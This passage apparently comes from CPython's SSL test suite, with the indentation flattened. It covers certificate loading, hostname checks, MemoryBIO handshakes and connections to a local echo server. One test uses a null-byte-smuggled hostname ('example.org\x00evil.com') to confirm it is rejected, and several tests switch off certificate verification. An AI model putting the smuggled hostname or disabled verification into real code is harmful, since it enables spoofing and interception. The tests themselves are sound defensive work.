self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(
ssl.SSLError,
"no start line: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(
ssl.SSLError,
"not enough data: cadata does not contain a certificate"
):
ctx.load_verify_locations(cadata=b"broken")
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in {ssl.PROTOCOL_TLS_CLIENT, ssl.PROTOCOL_TLS_SERVER}:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'notAfter': 'Mar 29 12:29:49 2033 GMT',
'notBefore': 'Mar 30 12:29:49 2003 GMT',
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', 'support@cacert.org'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with os_helper.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
with warnings_helper.check_warnings():
ctx = ssl._create_stdlib_context(
ssl.PROTOCOL_TLSv1_2,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True
)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1_2)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
with warnings_helper.check_warnings():
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(), server_side=True)
self.assertIsInstance(obj, MySSLObject)
    def test_num_tickets(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.num_tickets, 2)
ctx.num_tickets = 1
self.assertEqual(ctx.num_tickets, 1)
ctx.num_tickets = 0
self.assertEqual(ctx.num_tickets, 0)
with self.assertRaises(ValueError):
ctx.num_tickets = -1
with self.assertRaises(TypeError):
ctx.num_tickets = None
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.num_tickets, 2)
with self.assertRaises(ValueError):
ctx.num_tickets = 1
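
# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the test suite): the client-side context
# configuration exercised piecemeal by ContextTests above, combined into one
# helper.  It relies on the module-level ``ssl`` import and on SIGNING_CA,
# the suite's own CA file; the commented-out paths are placeholders.
def _example_client_context(cafile=SIGNING_CA):
    # create_default_context() returns a PROTOCOL_TLS_CLIENT context with
    # check_hostname=True and verify_mode=CERT_REQUIRED (see
    # test_create_default_context above).
    ctx = ssl.create_default_context(cafile=cafile)
    # Pin the negotiable protocol range, as probed by test_min_max_version.
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
    # An encrypted client key could be loaded with a password callback that
    # returns str, bytes or bytearray, mirroring test_load_cert_chain:
    #   ctx.load_cert_chain("client.pem", "client.key", password=lambda: "secret")
    return ctx
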
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
@unittest.skipIf(Py_DEBUG_WIN32, "Avoid mixing debug/release CRT on Windows")
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
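
# Illustrative sketch (not part of the test suite): the MemoryBIO behaviour
# covered by MemoryBIOTests above, in the order an application typically
# observes it.
def _example_memory_bio_roundtrip():
    bio = ssl.MemoryBIO()
    bio.write(b"hello")           # only bytes-like objects are accepted
    assert bio.pending == 5       # number of buffered bytes
    assert bio.read(2) == b"he"   # partial reads are allowed
    bio.write_eof()               # no further writes after this
    assert bio.read() == b"llo"
    assert bio.eof                # eof only once the buffer is drained
    return bio
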
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
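
# Illustrative sketch (not part of the test suite): the BIO "pump" that
# test_unwrap() above runs inline, written as a helper.  testing_context()
# is the suite's own fixture defined earlier in this file.
def _example_in_memory_handshake():
    client_ctx, server_ctx, hostname = testing_context()
    c_in, c_out = ssl.MemoryBIO(), ssl.MemoryBIO()
    s_in, s_out = ssl.MemoryBIO(), ssl.MemoryBIO()
    client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
    server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
    # A handful of round trips is enough to settle the handshake; each side
    # raises SSLWantReadError until it has been fed the peer's output.
    for _ in range(10):
        for sslobj, src, dst in ((client, c_out, s_in), (server, s_out, c_in)):
            try:
                sslobj.do_handshake()
            except ssl.SSLWantReadError:
                pass
            if src.pending:
                dst.write(src.read())
    # Both handshakes are now complete, so neither call may raise.
    client.do_handshake()
    server.do_handshake()
    return client, server
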
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
self.server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.server_context.load_cert_chain(SIGNED_CERTFILE)
server = ThreadedEchoServer(context=self.server_context)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname="dummy") as s:
s.connect(self.server_addr)
ctx.verify_mode = ssl.CERT_REQUIRED
# This should succeed because we specify the root cert
ctx.load_verify_locations(SIGNING_CA)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_with_context_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
s = ctx.wrap_socket(
socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME
)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_capath(self):
# Verify server certificates using the `capath` argument
# NOTE: the subject hashing algorithm has been changed between
# OpenSSL 0.9.8n and 1.0.0, as a result the capath directory must
# contain both versions of each certificate (same content, different
# filename) for this test to be portable across OpenSSL releases.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# Same with a bytes `capath` argument
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=BYTES_CAPATH)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
def test_connect_cadata(self):
with open(SIGNING_CA) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=pem)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
# same with DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=der)
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
@unittest.skipIf(os.name == "nt", "Can't use a socket as a file under Windows")
def test_makefile_close(self):
# Issue #5238: creating a file-like object with makefile() shouldn't
# delay closing the underlying "real socket" (here tested with its
# file descriptor, hence skipping the test under Windows).
ss = test_wrap_socket(socket.socket(socket.AF_INET))
ss.connect(self.server_addr)
fd = ss.fileno()
f = ss.makefile()
f.close()
# The fd is still open
os.read(fd, 0)
# Closing the SSL socket should close the fd too
ss.close()
gc.collect()
with self.assertRaises(OSError) as e:
os.read(fd, 0)
self.assertEqual(e.exception.errno, errno.EBADF)
def test_non_blocking_handshake(self):
s = socket.socket(socket.AF_INET)
s.connect(self.server_addr)
s.setblocking(False)
s = test_wrap_socket(s,
cert_reqs=ssl.CERT_NONE,
do_handshake_on_connect=False)
self.addCleanup(s.close)
count = 0
while True:
try:
count += 1
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [])
except ssl.SSLWantWriteError:
select.select([], [s], [])
if support.verbose:
sys.stdout.write("\nNeeded %d calls to do_handshake() to establish session.\n" % count)
def test_get_server_certificate(self):
_test_get_server_certificate(self, *self.server_addr, cert=SIGNING_CA)
def test_get_server_certificate_sni(self):
host, port = self.server_addr
server_names = []
# We store servername_cb arguments to make sure they match the host
def servername_cb(ssl_sock, server_name, initial_context):
server_names.append(server_name)
self.server_context.set_servername_callback(servername_cb)
pem = ssl.get_server_certificate((host, port))
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
pem = ssl.get_server_certificate((host, port), ca_certs=SIGNING_CA)
if not pem:
self.fail("No server certificate on %s:%s!" % (host, port))
if support.verbose:
sys.stdout.write("\nVerified certificate for %s:%s is\n%s\n" % (host, port, pem))
self.assertEqual(server_names, [host, host])
def test_get_server_certificate_fail(self):
# Connection failure crashes ThreadedEchoServer, so run this in an
# independent test method
_test_get_server_certificate_fail(self, *self.server_addr)
def test_get_server_certificate_timeout(self):
def servername_cb(ssl_sock, server_name, initial_context):
time.sleep(0.2)
self.server_context.set_servername_callback(servername_cb)
with self.assertRaises(socket.timeout):
ssl.get_server_certificate(self.server_addr, ca_certs=SIGNING_CA,
timeout=0.1)
def test_ciphers(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="ALL") as s:
s.connect(self.server_addr)
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE, ciphers="DEFAULT") as s:
s.connect(self.server_addr)
# Error checking can happen at instantiation or when connecting
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
with socket.socket(socket.AF_INET) as sock:
s = test_wrap_socket(sock,
cert_reqs=ssl.CERT_NONE, ciphers="^$:,;?*'dorothyx")
s.connect(self.server_addr)
def test_get_ca_certs_capath(self):
# capath certs are loaded on request
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(capath=CAPATH)
self.assertEqual(ctx.get_ca_certs(), [])
with ctx.wrap_socket(socket.socket(socket.AF_INET),
server_hostname='localhost') as s:
s.connect(self.server_addr)
cert = s.getpeercert()
self.assertTrue(cert)
self.assertEqual(len(ctx.get_ca_certs()), 1)
def test_context_setget(self):
# Check that the context of a connected socket can be replaced.
ctx1 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx1.load_verify_locations(capath=CAPATH)
ctx2 = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx2.load_verify_locations(capath=CAPATH)
s = socket.socket(socket.AF_INET)
with ctx1.wrap_socket(s, server_hostname='localhost') as ss:
ss.connect(self.server_addr)
self.assertIs(ss.context, ctx1)
self.assertIs(ss._sslobj.context, ctx1)
ss.context = ctx2
self.assertIs(ss.context, ctx2)
self.assertIs(ss._sslobj.context, ctx2)
def ssl_io_loop(self, sock, incoming, outgoing, func, *args, **kwargs):
        # A simple I/O loop: call func(*args) and, depending on the error we get
        # (WANT_READ or WANT_WRITE), move data between the socket and the BIOs.
timeout = kwargs.get('timeout', support.SHORT_TIMEOUT)
deadline = time.monotonic() + timeout
count = 0
while True:
if time.monotonic() > deadline:
self.fail("timeout")
errno = None
count += 1
try:
ret = func(*args)
except ssl.SSLError as e:
if e.errno not in (ssl.SSL_ERROR_WANT_READ,
ssl.SSL_ERROR_WANT_WRITE):
raise
errno = e.errno
